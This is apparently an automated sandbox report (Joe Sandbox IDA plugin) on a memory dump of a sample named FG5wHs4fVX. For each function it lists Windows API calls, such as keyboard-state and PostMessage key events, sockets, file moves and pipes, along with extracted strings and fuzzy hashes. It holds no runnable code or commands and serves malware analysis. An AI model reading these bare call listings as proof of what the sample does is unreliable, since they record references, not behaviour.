GetMenuItemCount.USER32(00000000), ref: 007F21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007F21DD
_wcslen.LIBCMT ref: 007F2213
GetMenuItemID.USER32(?,?), ref: 007F224D
GetSubMenu.USER32(?,?), ref: 007F225B

Part of subcall function 007C3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 007C3A57
Part of subcall function 007C3A3D: GetCurrentThreadId.KERNEL32 ref: 007C3A5E
Part of subcall function 007C3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007C25B3), ref: 007C3A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007F22E3

Part of subcall function 007CE97B: Sleep.KERNEL32 ref: 007CE9F3

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 6765bb9f06f6eac74c359ad9c67819b416286d05df932cc31d5fde6b073cedb0
Instruction ID: 883e40791469eb38d73294fb428b7b907dc7b274f41298ba0dfa3ba4dfdcd537
Opcode Fuzzy Hash: 6765bb9f06f6eac74c359ad9c67819b416286d05df932cc31d5fde6b073cedb0
Instruction Fuzzy Hash: 6F716E75A00209EFCB11DFA4C845ABEB7B5FF48320F158459E916EB352DB38AD42CB90

Function 007CAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 007CAEF9
GetKeyboardState.USER32(?), ref: 007CAF0E
SetKeyboardState.USER32(?), ref: 007CAF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 007CAF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 007CAFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 007CAFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 007CB020

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 8ac60a661105fa30837371c6ab7298d2b5e4304575505cd3d56ec418ae1e0afb
Instruction ID: 511260098aef587e4d173eee4010024c588df1966b16e681d619bd6895458dfa
Opcode Fuzzy Hash: 8ac60a661105fa30837371c6ab7298d2b5e4304575505cd3d56ec418ae1e0afb
Instruction Fuzzy Hash: 235191A0A046D93DFB365234884AFBA7FA95B06309F08858DF1D5954C2D3ADE8C4D752

Function 007CACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 007CAD19
GetKeyboardState.USER32(?), ref: 007CAD2E
SetKeyboardState.USER32(?), ref: 007CAD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 007CADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 007CADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 007CAE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 007CAE38

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: b60816ef7141ff6ad96cd23368e389fadfa595c9e68faa50533afba08f78f5ec
Instruction ID: 38d49f3bd522b58cb5fe50994f1a38da6913c5357478248d68c81b081741b93f
Opcode Fuzzy Hash: b60816ef7141ff6ad96cd23368e389fadfa595c9e68faa50533afba08f78f5ec
Instruction Fuzzy Hash: 4151C6A16047D93DFB3742348C56F7A7F986B4530AF08858CE1D6468C3D29CEC84D792

Function 0079542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(007A3CD6,?,?,?,?,?,?,?,?,00795BA3,?,?,007A3CD6,?,?), ref: 00795470
__fassign.LIBCMT ref: 007954EB
__fassign.LIBCMT ref: 00795506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,007A3CD6,00000005,00000000,00000000), ref: 0079552C
WriteFile.KERNEL32(?,007A3CD6,00000000,00795BA3,00000000,?,?,?,?,?,?,?,?,?,00795BA3,?), ref: 0079554B
WriteFile.KERNEL32(?,?,00000001,00795BA3,00000000,?,?,?,?,?,?,?,?,?,00795BA3,?), ref: 00795584

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: e1887ba2a1e73f4e284c4ca1351c969aac225d577cba5a9bee3d40d6946000f3
Instruction ID: 4e3b4bf6158d6c35d114f0106ecb82712a87dae341d376371fb18083ba175651
Opcode Fuzzy Hash: e1887ba2a1e73f4e284c4ca1351c969aac225d577cba5a9bee3d40d6946000f3
Instruction Fuzzy Hash: BB51F5B09006499FCF11CFA8E845AEEBBFAEF08300F15401AF545E3292E734AA51CB60

Function 007F6B76 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 007F6C33
SetWindowLongW.USER32(?,000000EC,?), ref: 007F6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 007F6C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,007DAB79,00000000,00000000), ref: 007F6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 007F6CC7

Strings

@U=u, xrefs: 007F6C73

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID: @U=u
API String ID: 3688381893-2594219639
Opcode ID: 85c5c059982f28adde638cd59868f3a993ae1c1d63d072682e69e3f2197f829f
Instruction ID: 79ab97a5c78621c7fafe24b461743bb70fc2d7f626d1f2e32f58850aac7b40d6
Opcode Fuzzy Hash: 85c5c059982f28adde638cd59868f3a993ae1c1d63d072682e69e3f2197f829f
Instruction Fuzzy Hash: 6841C135604108AFDB25DF28CD58FB97BA5EB09360F150268EA95E73A1C379BD41CA60

Function 007E10B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007E304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 007E307A
Part of subcall function 007E304E: _wcslen.LIBCMT ref: 007E309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 007E1112
WSAGetLastError.WSOCK32 ref: 007E1121
WSAGetLastError.WSOCK32 ref: 007E11C9
closesocket.WSOCK32(00000000), ref: 007E11F9

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 9e904928f5d67c3021929be23378ac463fb9eb252eb809e84c5c0b4334a9d2e8
Instruction ID: 905a3faf485d2de2e03d1e834ef27beeeb051e9e400049ceef3c995e0ad8e779
Opcode Fuzzy Hash: 9e904928f5d67c3021929be23378ac463fb9eb252eb809e84c5c0b4334a9d2e8
Instruction Fuzzy Hash: 3A411231200248EFDB119F55C889BAABBE9EF49364F148059FD069B292C778AD41CBA1

Function 007CCF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 007CDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007CCF22,?), ref: 007CDDFD

Part of subcall function 007CDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007CCF22,?), ref: 007CDE16

lstrcmpiW.KERNEL32(?,?), ref: 007CCF45
MoveFileW.KERNEL32(?,?), ref: 007CCF7F
_wcslen.LIBCMT ref: 007CD005
_wcslen.LIBCMT ref: 007CD01B
SHFileOperationW.SHELL32(?), ref: 007CD061

Strings

\*.*, xrefs: 007CCFF3

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
String ID: \*.*
API String ID: 3164238972-1173974218
Opcode ID: 3fe4b8be4269d5df45a0faba0c678c37671f8fd4e513ef6bc827566da8b87b13
Instruction ID: fa3b09f40fe7a49826eabf28e326c10d7dbdc55f7ffef71ca7b9fb8359fc8944
Opcode Fuzzy Hash: 3fe4b8be4269d5df45a0faba0c678c37671f8fd4e513ef6bc827566da8b87b13
Instruction Fuzzy Hash: 1041487294521D9FDF13EBA4D985FDDB7B9AF08340F1400EEE509E7141EA38AA85CB50

Function 007C7726 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007C7769
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007C778F
SysAllocString.OLEAUT32(00000000), ref: 007C7792
SysAllocString.OLEAUT32(?), ref: 007C77B0
SysFreeString.OLEAUT32(?), ref: 007C77B9
StringFromGUID2.OLE32(?,?,00000028), ref: 007C77DE
SysAllocString.OLEAUT32(?), ref: 007C77EC

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: a1ce1ef63e1a7a068c9684cb8f946b51f0c50b9a8775c54909d32a8d21a849a9
Instruction ID: 8e749c59bd0651ed42a1395455394ecee852d14b276605b4b2028e5bb4a6aa43
Opcode Fuzzy Hash: a1ce1ef63e1a7a068c9684cb8f946b51f0c50b9a8775c54909d32a8d21a849a9
Instruction Fuzzy Hash: 0F21B27660821DAFDF14DFA8CD88DBB77ACEB093647008029F914DB150DA78DC45CB64

Function 007C77FD Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007C7842
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 007C7868
SysAllocString.OLEAUT32(00000000), ref: 007C786B
SysAllocString.OLEAUT32 ref: 007C788C
SysFreeString.OLEAUT32 ref: 007C7895
StringFromGUID2.OLE32(?,?,00000028), ref: 007C78AF
SysAllocString.OLEAUT32(?), ref: 007C78BD

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 25f4f75d0e206d9b4d0ff02d108f488b4a36a8ceb864566793945ff424df443d
Instruction ID: 5e6e286ea235e9ff543546201529dcc4d14f3a8d8e0c136abea54292afff1c43
Opcode Fuzzy Hash: 25f4f75d0e206d9b4d0ff02d108f488b4a36a8ceb864566793945ff424df443d
Instruction Fuzzy Hash: F5217771608208AFDF149FA8DC8DEBA77ECEB097607108129FA15CB1A1DA78DC41CB64

Function 007F5706 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 007F5745
SendMessageW.USER32(?,00001074,?,00000001), ref: 007F579D
_wcslen.LIBCMT ref: 007F57AF
_wcslen.LIBCMT ref: 007F57BA
SendMessageW.USER32(?,00001002,00000000,?), ref: 007F5816

Strings

@U=u, xrefs: 007F5745, 007F579D, 007F5816

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID: @U=u
API String ID: 763830540-2594219639
Opcode ID: 5000a2bf24dee0702805f2c4ac353d55a435c010800e6777b7ace05ff5dab7af
Instruction ID: 3d234f6c72bddfd8a752f4e4876126841fddecb005365844a1e072483cbc1fec
Opcode Fuzzy Hash: 5000a2bf24dee0702805f2c4ac353d55a435c010800e6777b7ace05ff5dab7af
Instruction Fuzzy Hash: EE21857190461CDADB209F60CC85EFD77B8FF44724F108256EB29EA280D7789985CF50

Function 007D04D2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 007D04F2
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D052E

Strings

nul, xrefs: 007D0567

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 3b103bb89bb5378c55324e40030b6f0a1c34e4d1c996ee9814d53104923a7491
Instruction ID: 7d16916d226318b0d0f3f64ea220e1d17aae8ea41b9f42b916b503b656c7d6e1
Opcode Fuzzy Hash: 3b103bb89bb5378c55324e40030b6f0a1c34e4d1c996ee9814d53104923a7491
Instruction Fuzzy Hash: CF214F75500205DBDB209F29E849F5A77B4BF45724F204A1AECA2D72E0D7749960DFA0

Function 007D05A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 007D05C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 007D0601

Strings

nul, xrefs: 007D0639

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: 658d1a1f82c654d96801e5ba812c4bf8a91496b6a09deb02cb8e1dc060c32027
Instruction ID: 4ec2d80e92878d0087e622ca05248f46789aa7264772030b1677d78c50b047cc
Opcode Fuzzy Hash: 658d1a1f82c654d96801e5ba812c4bf8a91496b6a09deb02cb8e1dc060c32027
Instruction Fuzzy Hash: 5E217F75500305DBDB209F799C08BAA77B4BF95720F204A1AE8A1E73E0D774D860CBA4

Function 007F40AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0076600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0076604C
Part of subcall function 0076600E: GetStockObject.GDI32(00000011), ref: 00766060
Part of subcall function 0076600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0076606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007F4112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007F411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007F412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007F4139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007F4145

Strings

Msctls_Progress32, xrefs: 007F40E3

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 05d414ec003576edbdcb3073769ef6bf9c3cde5d02e9da61900eaf148bf237e9
Instruction ID: 5a30e52f7edbb181e58447be12583d226a865bf028d6a3fcce4746a65dcb2030
Opcode Fuzzy Hash: 05d414ec003576edbdcb3073769ef6bf9c3cde5d02e9da61900eaf148bf237e9
Instruction Fuzzy Hash: 78115EB215021DBEEF119E64CC85EE77F9DEF08798F014111BB18A6150CA769C61DBA4

Function 0079D7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0079D7A3: _free.LIBCMT ref: 0079D7CC

_free.LIBCMT ref: 0079D82D

Part of subcall function 007929C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0079D7D1,00000000,00000000,00000000,00000000,?,0079D7F8,00000000,00000007,00000000,?,0079DBF5,00000000), ref: 007929DE
Part of subcall function 007929C8: GetLastError.KERNEL32(00000000,?,0079D7D1,00000000,00000000,00000000,00000000,?,0079D7F8,00000000,00000007,00000000,?,0079DBF5,00000000,00000000), ref: 007929F0

_free.LIBCMT ref: 0079D838
_free.LIBCMT ref: 0079D843
_free.LIBCMT ref: 0079D897
_free.LIBCMT ref: 0079D8A2
_free.LIBCMT ref: 0079D8AD
_free.LIBCMT ref: 0079D8B8

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: 6b11a2716bc8512c6ca70ec62132eda6835277423126fcbd800a157c20a4b442
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: CF11CC71541B04FADE31BFF0EC4AFCB7B9C6F05710F404825B29DA65A2DA69B9064AA0

Function 007CDA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007CDA74
LoadStringW.USER32(00000000), ref: 007CDA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007CDA91
LoadStringW.USER32(00000000), ref: 007CDA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 007CDADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 007CDAB9

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 08e71455ec7591f1cfcaac7377abc01b6a82d1bfad76ff1cdc9c62f840b44fad
Instruction ID: a59411001edfb2392be26d10ae119a077cd91f34af7066f627a6b72c3b605dfa
Opcode Fuzzy Hash: 08e71455ec7591f1cfcaac7377abc01b6a82d1bfad76ff1cdc9c62f840b44fad
Instruction Fuzzy Hash: 380186F250020C7FE711ABA49E89EFB736CE708701F4084A5B746E2041E6789E848F78

Function 007D096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0120E188,0120E188), ref: 007D097B
EnterCriticalSection.KERNEL32(0120E168,00000000), ref: 007D098D
TerminateThread.KERNEL32(00000000,000001F6), ref: 007D099B
WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 007D09A9
CloseHandle.KERNEL32(00000000), ref: 007D09B8
InterlockedExchange.KERNEL32(0120E188,000001F6), ref: 007D09C8
LeaveCriticalSection.KERNEL32(0120E168), ref: 007D09CF

Memory Dump Source

Source File: 00000000.00000002.1415956191.0000000000761000.00000020.00000001.01000000.00000003.sdmp, Offset: 00760000, based on PE: true

Associated: 00000000.00000002.1415936539.0000000000760000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.00000000007FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416018913.0000000000822000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416067688.000000000082C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1416085086.0000000000834000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_760000_FG5wHs4fVX.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 78a8e1812ff75cc167c26a145070f1a2253dbcd169c8a572b32063f183f70c63
Instruction ID: 895fb2c24da9526686ce4e1c57b3b1053244708a0fc33ee8f678a273516a24c7
Opcode Fuzzy Hash: 78a8e1812ff75cc167c26a145070f1a2253dbcd169c8a572b32063f183f70c63
